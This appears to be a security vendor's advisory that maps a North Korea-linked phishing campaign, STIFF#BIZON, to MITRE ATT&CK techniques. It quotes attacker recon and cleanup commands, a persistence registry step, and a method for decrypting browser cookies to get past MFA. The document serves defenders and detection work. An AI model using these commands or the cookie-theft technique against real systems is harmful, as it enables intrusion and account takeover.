Securonix Threat Labs Initial Coverage Advisory: STIFF#BIZON Detection Using Securonix – New Attack Campaign Observed Possibly Linked to Konni/APT37 (North Korea)

MITRE Techniques

• [T1566.001] Spearphishing Attachment – Infection starts through phishing emails with a malicious attachment. ‘The infection starts through phishing emails, which attempt to lure the victim to open a malicious attachment. In this particular case the threat actors attached a file containing the malware.’
• [T1059.001] PowerShell – Base64 payload executed as a PowerShell stager initiating C2 and downloading/running files. ‘The Base64 payload is executed as another PowerShell stager which initiates C2 communication and downloads and runs both “weapons.doc” and “wp.vbs” files.’
• [T1059.003] Windows Command Shell – Command-line activity observed during recon (e.g., ‘cmd /c tasklist’ and similar). ‘Initial recon begins: cmd /c cd /d “C:Users” && dir /a/o-d/s *.*’
• [T1053.005] Scheduled Task – wp.vbs creates a new scheduled task that runs a PowerShell script encoded in Base64. ‘The scheduled task executes a PowerShell script encoded in Base64.’
• [T1569.002] Service Execution – Service-based persistence and execution (e.g., wpcsvc service manipulation and DLL/services). ‘Service installation for persistence’ and related registry/service commands (e.g., reg add … wpcsvc.dll).
• [T1134.001] Token Impersonation/Theft – Decrypting browser state to bypass MFA using a stored state key. ‘This state key is encrypted using DPAPI… decrypt the cookie database offline and use this to import cookies into a machine controlled by the TA and access any available services without MFA authentication.’
• [T1548.002] Bypass User Account Control – Anti-debugging and privilege escalation via rundll32 usage and WaitForDebugEvent tricks. ‘anti-debugging techniques with API WaitForDebugEvent and ContinueDebugEvent to execute passed cmdline.’
• [T1027.005] Indicator Removal from Tools – Deleting traces (e.g., ‘del /f /q’ of artifacts). ‘del /f /q “C:Windowssystem32wpcsvc.*”‘ (examples of cleanup steps).
• [T1606.001] Web Cookies – Harvesting browser credentials to access services without MFA. ‘State key … encrypted using DPAPI… decrypt the cookie database offline and use cookies to access services without MFA authentication.’
• [T1082] System Information Discovery – Gathering host information during recon (e.g., ‘systeminfo’, ‘dir’, ‘tasklist’). ‘cmd /c systeminfo’ and similar commands.
• [T1113] Screen Capture – Capturing screenshots and exfiltrating results. ‘Capture.net.exe … to create a screenshot using Win32 GDI API and upload the gzipped results to the C2 server.’
• [T1119] Automated Collection – Automated data gathering from the infected host (e.g., browser data, credentials).
• [T1071.001] Web Protocols – Command and control over HTTP(S) endpoints (view.php, info.php, dn.php). ‘Download lure document: weapons.doc: /view.php?…’ and similar C2 communications.
• [T1105] Ingress Tool Transfer – Transferring tools/TA files to the victim host. ‘Transfer tools/TA files to victim host:’
• [T1041] Exfiltration Over C2 Channel – Data exfiltration conducted via C2 channel. ‘Automated Exfiltrated’ and ‘Exfiltration Over C2 Channel’ referenced.